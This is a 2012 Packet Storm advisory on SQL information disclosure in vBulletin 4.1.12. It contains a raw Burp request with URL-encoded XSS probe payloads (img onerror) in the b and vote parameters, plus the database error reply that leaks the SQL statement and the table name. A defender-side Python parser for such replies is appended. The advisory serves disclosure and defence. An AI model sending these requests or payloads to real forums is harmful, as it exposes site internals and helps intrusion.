vBulletin 4.1.12 SQL Information Disclosure

2012-06-08T00:00:00
ID PACKETSTORM:113421
Type packetstorm
Reporter HauntIT
Modified 2012-06-08T00:00:00

Description

                                        
[ TITLE ....... ][ vBulletin 4.1.12 - sql information leak (for logged-in users)  
[ DATE ........ ][ 03.05.2012  
[ AUTOHR ...... ][ http://hauntit.blogspot.com  
[ SOFT LINK ... ][ http://www.vbulletin.com  
[ VERSION ..... ][ 4.1.12  
[ TESTED ON ... ][ LAMP  
[ ----------------------------------------------------------------------- [  
  
[ 1. What is this?  
[ 2. What is the type of vulnerability?  
[ 3. Where is the bug :)  
[ 4. More...  
  
[--------------------------------------------[  
[ 1. What is this?  
This is a very nice CMS, you should try it! ;)  
  
[--------------------------------------------[  
[ 2. What is the type of vulnerability?  
SQL information disclosure: when the blog rating request fails, the full database error (the invalid SQL statement with its table and column names, the MySQL error text and error number) is returned to the logged-in user.  
  
[--------------------------------------------[  
[ 3. Where is the bug :)  
  
--- raw from Burp ---  
POST /www/22o4/highz/las/blog.php?b=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]&vote=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml] HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
X-Requested-With: XMLHttpRequest  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Referer: http://localhost/www/22o4/highz/las/entry.php?2-html-quot-gt-lt-img-src-xxx-onerror-alert(9999)-gt-html  
Cookie: skimlinks_enabled=1; vbulletin_userlist_hide_avatars_buddylist=0; editor_height=cms_article%23207px; bb_lastvisit=1335789702; bb_lastactivity=0; bb_sessionhash=bcf4631bc0ea002087ded92c796ac79a; bb_userstyleid=1; bb_skipmobilestyle=0; bb_thread_lastview=7aeffb9e62242afd6746ab9c8bcb589269ddf416a-1-%7Bi-121_i-1335789759_%7D; bb_forum_view=0ca42d3e5b599ba0a771e794d5098040cf6497cba-3-%7Bi-3_i-1335862432_i-2_i-1336034464_i-1_i-1336034445_%7D; bb_calendar=e2e67b4d0ec6ed855d66d62b21910a6cf6af50d6a-3-%7Bs-7-.calyear._i-2012_s-8-.calmonth._i-5_s-8-.calview1._s-12-.displaymonth._%7D; bb_blog_lastview=47cf4ac63a62d3c29c6a536323fa891bc5b8cd46a-1-%7Bi-2_i-1336037033_%7D  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Length: 630  
Connection: close  
  
ajax=1&s=&securitytoken=1336037033-b3ba5f3786a6e5e260d2c6ccde476dd5bde7dc4d&vote=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]&s=&securitytoken=1336037033-b3ba5f3786a6e5e260d2c6ccde476dd5bde7dc4d&do=rate&b=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]&  
  
---and-HTTP-answer---  
  
HTTP/1.1 200 OK  
Date: Thu, 03 May 2012 09:26:51 GMT  
Server: Apache/2.2.17 (Ubuntu)  
X-Powered-By: PHP/5.3.5-1ubuntu7.7  
Vary: Accept-Encoding  
Connection: close  
Content-Type: text/xml; charset=windows-1252  
X-Pad: avoid browser bug  
Content-Length: 1650  
  
<?xml version="1.0" encoding="windows-1252"?>  
<errors>  
<error><![CDATA[<p>Database Error</p>]]></error>  
<error_html><![CDATA[<p>Database error in vBulletin 4.1.12 Beta 1</p>  
<p>Invalid SQL:  
REPLACE INTO blog_visitor  
(userid, visitorid, dateline, day, visible)  
VALUES  
(  
,  
2,  
1336037212,  
1335909600,  
1  
);<p>  
<p>  
<strong>MySQL Error</strong> : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '  
2,  
1336037212,  
1335909600,  
1  
)' at line 5<br />  
<strong>Error Number</strong> : 1064<br />  
<strong>Request Date</strong> : Thursday, May 3rd 2012 @ 11:26:52 AM<br />  
<strong>Error Date</strong> : Thursday, May 3rd 2012 @ 11:26:56 AM<br />  
<strong>Script</strong> : http://localhost/www/22o4/highz/las/blog.php?b=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]&vote=[%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml][%2fhtml][html]"%3e%3cimg%20src%3dx%20onerror%3d(1231234444444)%3b%3e[%2fhtml]<br />  
<strong>Referrer</strong> : http://localhost/www/22o4/highz/las/entry.php?2-html-quot-gt-lt-img-src-xxx-onerror-alert(9999)-gt-html<br />  
<strong>Classname</strong> : vB_Database<br />  
<strong>MySQL Version</strong> : <br />  
</p>]]></error_html>  
</errors>  
  
  
---  
  
Enjoy ;)  
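As an added defender-side example (not part of the original advisory and not vBulletin code), the Python below parses the XML error reply captured above and extracts what such a reply discloses to the client: the failed statement, the table it names, the MySQL error and error number, plus a flag for the empty first VALUES slot where the blog id from `b=` should have been. It is meant for checking responses from a test instance or proxy log; the sample body is constructed and shortened from the capture.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample modelled on the vBulletin 4.1.12 XML error reply captured
# above (shortened; element names, field labels and the statement match it).
SAMPLE_RESPONSE = """<?xml version="1.0" encoding="windows-1252"?>
<errors>
<error><![CDATA[<p>Database Error</p>]]></error>
<error_html><![CDATA[<p>Database error in vBulletin 4.1.12 Beta 1</p>
<p>Invalid SQL:
REPLACE INTO blog_visitor (userid, visitorid, dateline, day, visible)
VALUES ( , 2, 1336037212, 1335909600, 1 );<p>
<p>
<strong>MySQL Error</strong> : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ', 2, 1336037212, 1335909600, 1 )' at line 5<br />
<strong>Error Number</strong> : 1064<br />
<strong>Classname</strong> : vB_Database<br />
</p>]]></error_html>
</errors>
"""

TAG_RE = re.compile(r"<[^>]+>")


def parse_vb_db_error(body: str):
    """Return what a vBulletin 'Database error' XML reply discloses, or None
    when the body is not such a reply (e.g. a normal rating response)."""
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", body)  # we parse an already decoded str
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    node = root.find("error_html")
    if node is None or not node.text or "Database error" not in node.text:
        return None
    text = TAG_RE.sub("", node.text)  # the CDATA carries HTML; drop the tags
    sql = re.search(r"Invalid SQL:\s*(.*?);", text, re.S)
    err = re.search(r"MySQL Error\s*:\s*(.*?)\s*Error Number", text, re.S)
    num = re.search(r"Error Number\s*:\s*(\d+)", text)
    query = " ".join(sql.group(1).split()) if sql else ""
    return {
        "query": query,
        # table names the reply gives away (REPLACE/INSERT INTO, FROM, UPDATE, JOIN)
        "tables": sorted(set(re.findall(
            r"\b(?:INTO|FROM|UPDATE|JOIN)\s+(\w+)", query, re.I))),
        "mysql_error": " ".join(err.group(1).split()) if err else "",
        "error_number": int(num.group(1)) if num else None,
        # an empty first VALUES slot: the blog id from ?b= never became a number
        "empty_value_slot": bool(re.search(r"\(\s*,", query)),
    }
```

Feeding the captured response body to `parse_vb_db_error` returns the statement, `["blog_visitor"]` as the leaked table and error number 1064, with `empty_value_slot` set; a normal rating reply returns None.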
[--------------------------------------------[  
[ 4. More...  
  
- http://hauntit.blogspot.com  
- http://www.google.com  
- http://portswigger.net  
[  
[--------------------------------------------[  
[ Questions? Mail me.  
]  
[ Cheers! o/  
[   
  